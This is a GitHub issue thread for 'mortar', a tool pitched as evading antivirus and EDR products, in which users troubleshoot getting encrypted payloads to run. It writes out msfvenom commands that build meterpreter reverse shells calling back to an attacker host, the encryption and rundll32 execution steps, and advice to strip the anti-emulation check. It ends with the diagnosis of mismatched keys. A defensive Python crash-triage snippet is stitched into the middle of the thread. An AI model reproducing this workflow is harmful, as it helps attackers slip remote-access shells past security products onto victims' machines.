0xsp-SRD / mortar

evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
MIT License
1.41k stars 226 forks

Can't get shellcode or binary to execute #18

Closed nathan-bowman closed 2 years ago

nathan-bowman commented 2 years ago

I'm running a fresh Windows 10, updated, with all Defender protection disabled for testing.

OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044

I can't seem to get the shellcode or shell binary to execute.

For example, create shell...

root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.x.x.x LPORT=8080 -f exe -o shell64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 713 bytes
Final size of exe file: 7168 bytes
Saved as: shell64.exe

At this point, manually executing the binary connects fine: Meterpreter session 1 opened (172.x.x.x:8080 -> 127.0.0.1)

However, encrypting and running with rundll32 doesn't work...

C:\Users\user\Desktop>C:\Users\user\Documents\GitHub\mortar\Encryptor\encryptor.exe -f shell64.exe -o bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to bin.enc
C:\Users\user\Desktop> rundll32.exe agressor.dll,start

At this point, I don't see any network traffic on the victim host.

It appears to trigger werfault.exe

image

lawrenceamer commented 2 years ago

It works fine for me; make sure you have compiled the DLL correctly and place the bin.enc in the same folder.

lawrenceamer commented 2 years ago

I would advise you to first use the following mimikatz to test if agressor.dll is compiled correctly: https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins. If mimikatz works, maybe there is some issue with your msfvenom payload, which is fine on my side.

nathan-bowman commented 2 years ago

> It works fine for me; make sure you have compiled the DLL correctly and place the bin.enc in the same folder.

How can I double check that the DLL compiled correctly?

It seems to compile, with some errors...

image

nathan-bowman commented 2 years ago

> I would advise you to first use the following mimikatz to test if agressor.dll is compiled correctly: https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins. If mimikatz works, maybe there is some issue with your msfvenom payload, which is fine on my side.

I renamed mimikatz.enc to bin.enc, dropped it in the current working directory with agressor.dll, and ran rundll32.exe agressor.dll,start and rundll32.exe agressor.dll,sh

Both don't work. So, perhaps I'm not compiling agressor.dll properly. Everything seems to compile fine, how can I verify?

lawrenceamer commented 2 years ago

image

Are you sure your project config is like that?

nathan-bowman commented 2 years ago

> image
>
> Are you sure your project config is like that?

I just verified, those are the same settings I have.

The Windows Application log shows Event ID 1000 errors.

Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b
Exception code: 0xe0465043
Fault offset: 0x0000000000034fd9
Faulting process id: 0x71c
Faulting application start time: 0x01d86f86ae713c8e
Faulting application path: C:\Windows\system32\rundll32.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: ede56f0a-c881-4752-bfc8-9c112894e97e
Faulting package full name: 
Faulting package-relative application ID: 
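
The crash record above carries two triage signals a defender can act on: rundll32.exe is only a host, so its fault belongs to whatever DLL it was asked to load, and 0xE0465043 has the customer bit set, meaning it is an application-defined exception raised by that DLL's runtime rather than a Windows status code. The following Python is an added example, not code from the issue or the mortar project; it runs that triage over constructed Event ID 1000 messages, and its mapping of 0xE0465043 to the Free Pascal runtime is an assumption.

```python
import re

# Constructed sample input: the Event ID 1000 record quoted above (rundll32.exe
# faulting in KERNELBASE.dll with code 0xe0465043) plus a benign control record.
SAMPLE_EVENTS = [
    "Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b\n"
    "Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b\n"
    "Exception code: 0xe0465043\n"
    "Faulting application path: C:\\Windows\\system32\\rundll32.exe\n",
    "Faulting application name: notepad.exe, version: 10.0.19041.1, time stamp: 0x11111111\n"
    "Faulting module name: ntdll.dll, version: 10.0.19041.1706, time stamp: 0x22222222\n"
    "Exception code: 0xc0000005\n"
    "Faulting application path: C:\\Windows\\system32\\notepad.exe\n",
]

# Windows binaries whose job is to host someone else's DLL: when they crash,
# the loaded DLL is the thing to look at.
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}
# 0xE0465043 spells 'EPC' and is the exception code the Free Pascal runtime
# raises on Windows (assumption); the DLL in this thread is built with FPC.
FPC_EXCEPTION_CODE = 0xE0465043

_FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<val>.*)$", re.MULTILINE)

def parse_wer_event(text):
    """Parse the 'key: value' lines of an Event ID 1000 message.
    Name fields read 'file, version: x, time stamp: y'; keep the file only."""
    fields = {m.group("key").strip().lower(): m.group("val").strip()
              for m in _FIELD_RE.finditer(text)}
    return {
        "app": fields.get("faulting application name", "").split(",")[0].strip().lower(),
        "module": fields.get("faulting module name", "").split(",")[0].strip().lower(),
        "exception_code": int(fields.get("exception code", "0x0"), 16),
    }

def triage_reasons(text):
    """Reasons this crash record deserves analyst attention; empty means ignore."""
    ev = parse_wer_event(text)
    reasons = []
    if ev["app"] in DLL_HOSTS:
        reasons.append("crash in DLL host " + ev["app"] + ": inspect the DLL it loaded")
    if ev["exception_code"] == FPC_EXCEPTION_CODE:
        reasons.append("Free Pascal runtime exception 0xE0465043: non-Microsoft code faulted")
    return reasons

def flagged_events(events):
    """Keep only the records that produced at least one triage reason."""
    return [(parse_wer_event(e)["app"], triage_reasons(e)) for e in events if triage_reasons(e)]
```

Feeding real Application-log exports through the same two functions lets a blue team separate ordinary application crashes from a DLL host dying inside non-Microsoft code.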

lawrenceamer commented 2 years ago

In order to see why that's happening on your system, let's try a shellcode load, not the PE: msfvenom -p payload -lhost -lport -f c -o shellcode.bin, and then encrypt it, then place the bin.enc with aggressor and execute only agressor.sh

nathan-bowman commented 2 years ago

> In order to see why that's happening on your system, let's try a shellcode load, not the PE: msfvenom -p payload -lhost -lport -f c -o shellcode.bin, and then encrypt it, then place the bin.enc with aggressor and execute only agressor.sh

Workflow:

root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 -f c -o shell.c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
Saved as: shell.c
C:\Users\user\Documents\GitHub\mortar\Encryptor>encryptor.exe -f \Users\user\Desktop\shell.c -o Users\user\Desktop\bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to \Users\user\Desktop\bin.enc

C:\Users\user\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 749B-11F1

 Directory of C:\Users\user\Desktop

05/24/2022  08:52 AM    <DIR>          .
05/24/2022  08:52 AM    <DIR>          ..
05/24/2022  08:55 AM           850,928 agressor.dll
05/24/2022  09:06 AM             2,888 bin.enc
05/24/2022  10:51 PM             2,166 shell.c

Doesn't work: C:\Users\user\Desktop>rundll32.exe agressor.dll,start

Doesn't work: C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

lawrenceamer commented 2 years ago

I will do the test on all matching OSes with a clean system run. If it is working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now.

nathan-bowman commented 2 years ago

> I will do the test on all matching OSes with a clean system run. If it is working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now.

Okay! I'm using libvirt kvm/qemu as a hypervisor. (https://libvirt.org/drvqemu.html)

lawrenceamer commented 2 years ago

Yup, that's clear now. I have an anti-emulator technique (could be some memory allocation), so it's better to try a regular PC or VMs.

nathan-bowman commented 2 years ago

> Yup, that's clear now. I have an anti-emulator technique (could be some memory allocation), so it's better to try a regular PC or VMs.

It is a VM though... What would be the difference between a VM on VirtualBox or VMWare Workstation vs what I'm using now?

lawrenceamer commented 2 years ago

I think that could be (not 100% sure) due to aggressor.dll not being able to allocate memory correctly. So, for example, in order to divert the AV emulator, the aggressor will try to see if it can allocate or not; if not, then exit. I feel that's what happened in your case. If you want to make sure, try to remove the following line and retest again: https://github.com/0xsp-SRD/mortar/blob/main/DLL/agressor.lpr#L188

if isEmulated = true  then
  exit
  else

nathan-bowman commented 2 years ago

That didn't help with the crashes

image

nathan-bowman commented 2 years ago

Same results with Windows 7 :(

image

nathan-bowman commented 2 years ago

Small update: I installed and updated Windows 10 on Hyper-V. Removed the isEmulated if-statements, set the compiler options to Win64 and x86_64.

And it still doesn't work.

@lawrenceamer What hypervisor are you using?

lawrenceamer commented 2 years ago

Try to use the following demo for the test: https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc, then agressor.dll,start

lawrenceamer commented 2 years ago

@nathan-bowman the issue was that you were using the encryptor (Windows version), which is not what it should be. In order to encrypt the files you have to use the Linux version of the encryptor; you can do that by installing Lazarus on Kali:

apt install fpc
apt install lazarus-ide

After that, you can compile the Encryptor only and use it to encrypt Windows binaries.

thedepartedpie commented 2 years ago

It's working for https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc but not for other payloads encrypted with the crypter.

lawrenceamer commented 2 years ago

While using the Linux encryptor, it should work with any x64 payload, or EXE that's not a .NET assembly. I have tested mortar with Msfvenom; cobalt also works fine.

nathan-bowman commented 2 years ago

> While using the Linux encryptor, it should work with any x64 payload, or EXE that's not a .NET assembly. I have tested mortar with Msfvenom; cobalt also works fine.

The bin.enc you provide does work for me with the agressor.dll I built. Now, trying my own shell...

Build encryptor:

root@localhost:/opt/mortar/Encryptor# lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
Parameter: recursive
Parameter: os=Linux
Parameter: cpu=x86_64
Hint: (lazarus) primary config path: /root/.lazarus
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="" TargetCPU="" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS= TargetCPU= CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) Build Project: nothing to do.
TCompiler.Compile WorkingDir="/opt/mortar/Encryptor/" CompilerFilename="/usr/bin/fpc" CompilerParams=" -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
[TCompiler.Compile] CmdLine="/usr/bin/fpc -B  -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="linux" TargetCPU="x86_64" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS=linux TargetCPU=x86_64 CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP" "-Px86_64" "-Tlinux"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas" "-Px86_64" "-Tlinux"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) TBuildManager.MacroFuncInstantFPCCache /usr/bin/instantfpc
Hint: (lazarus) [RunTool] "/usr/bin/instantfpc" "--get-cache"
Hint: (lazarus) [TBuildManager.MacroFuncInstantFPCCache] /root/.cache/instantfpc/
Info: (lazarus) Execute Title="Compile Project, Target: encryptor"
Info: (lazarus) Working Directory="/opt/mortar/Encryptor/"
Info: (lazarus) Executable="/usr/bin/fpc"
Info: (lazarus) Param[0]="-B"
Info: (lazarus) Param[1]="-Tlinux"
Info: (lazarus) Param[2]="-Px86_64"
Info: (lazarus) Param[3]="-MObjFPC"
Info: (lazarus) Param[4]="-Scghi"
Info: (lazarus) Param[5]="-Cg"
Info: (lazarus) Param[6]="-O1"
Info: (lazarus) Param[7]="-g"
Info: (lazarus) Param[8]="-gl"
Info: (lazarus) Param[9]="-l"
Info: (lazarus) Param[10]="-vewnhibq"
Info: (lazarus) Param[11]="-Fi/opt/mortar/Encryptor/lib/x86_64-linux"
Info: (lazarus) Param[12]="-Fu/opt/mortar/Encryptor/"
Info: (lazarus) Param[13]="-FU/opt/mortar/Encryptor/lib/x86_64-linux/"
Info: (lazarus) Param[14]="-FE/opt/mortar/Encryptor/"
Info: (lazarus) Param[15]="-o/opt/mortar/Encryptor/encryptor"
Info: (lazarus) Param[16]="encryptor.lpr"
Hint: (11030) Start of reading config file /etc/fpc.cfg
Hint: (11031) End of reading config file /etc/fpc.cfg
Free Pascal Compiler version 3.0.4+dfsg-23 [2019/11/25] for x86_64
Copyright (c) 1993-2017 by Florian Klaempfl and others
(1002) Target OS: Linux for x86-64
(3104) Compiling encryptor.lpr
/opt/mortar/Encryptor/encryptor.lpr(101,3) Note: (5025) Local variable "de" not used
/opt/mortar/Encryptor/encryptor.lpr(102,6) Note: (5025) Local variable "s2" not used
/opt/mortar/Encryptor/encryptor.lpr(103,7) Note: (5025) Local variable "temp" not used
/opt/mortar/Encryptor/encryptor.lpr(104,3) Note: (5025) Local variable "i" not used
/opt/mortar/Encryptor/encryptor.lpr(98,10) Warning: (5033) Function result does not seem to be set
/opt/mortar/Encryptor/encryptor.lpr(146,43) Hint: (5091) Local variable "b64_encoded" of a managed type does not seem to be initialized
(9015) Linking /opt/mortar/Encryptor/encryptor
/usr/bin/ld.bfd: warning: /opt/mortar/Encryptor/link.res contains output sections; did you forget -T?
(1008) 173 lines compiled, 0.3 sec
(1021) 1 warning(s) issued
(1022) 3 hint(s) issued
(1023) 4 note(s) issued
[TCompiler.Compile] end

Build reverse shell:

root@localhost:/opt/mortar/Encryptor# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 --platform windows --arch x64 -f exe -o /root/shell64.exe
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /root/shell64.exe

Test from target Win10:

[*] Meterpreter session 121 opened (172.x.x.x:8080 -> x.x.x.x:20099) at 2022-05-27 14:18:57 +0000

Encrypt:

root@localhost:/opt/mortar/Encryptor# ./encryptor -f /root/shell64.exe -o /root/bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to /root/bin.enc

Both of these fail on target Win10:

C:\Users\user\Desktop>rundll32.exe agressor.dll,start
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

jad017 commented 2 years ago

I have the same issue. It works well with the demo/bin.enc but not with my own payload.

lawrenceamer commented 2 years ago

image

It works with meterpreter; sometimes you need to execute it 3/4 times to make sure it is being executed in memory.

image

lawrenceamer commented 2 years ago

As I said, there are no issues on the mortar side; it is a kind of memory execution delay, or it could take time to be allocated with executable shellcode or an image. If it fails the first time, execute it 3/4 times to make it work.

nathan-bowman commented 2 years ago

> As I said, there are no issues on the mortar side; it is a kind of memory execution delay, or it could take time to be allocated with executable shellcode or an image. If it fails the first time, execute it 3/4 times to make it work.

How exactly are you compiling encryptor?

Like? lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

lawrenceamer commented 2 years ago

Pushed the compiled version of the encryptor: https://github.com/0xsp-SRD/mortar/releases/tag/v2

nathan-bowman commented 2 years ago

> Pushed the compiled version of the encryptor: https://github.com/0xsp-SRD/mortar/releases/tag/v2

That works! How are you compiling it? I'm using: lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

nathan-bowman commented 2 years ago

> > Pushed the compiled version of the encryptor: https://github.com/0xsp-SRD/mortar/releases/tag/v2
>
> That works! How are you compiling it? I'm using: lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

^^^ @lawrenceamer can you post how you are compiling the encryptor?

goofsec commented 2 years ago

Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also https://github.com/0xsp-SRD/mortar/pull/21

nathan-bowman commented 2 years ago

> Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21

This makes sense, I'll test later. If I don't reply again, it probably means that it worked.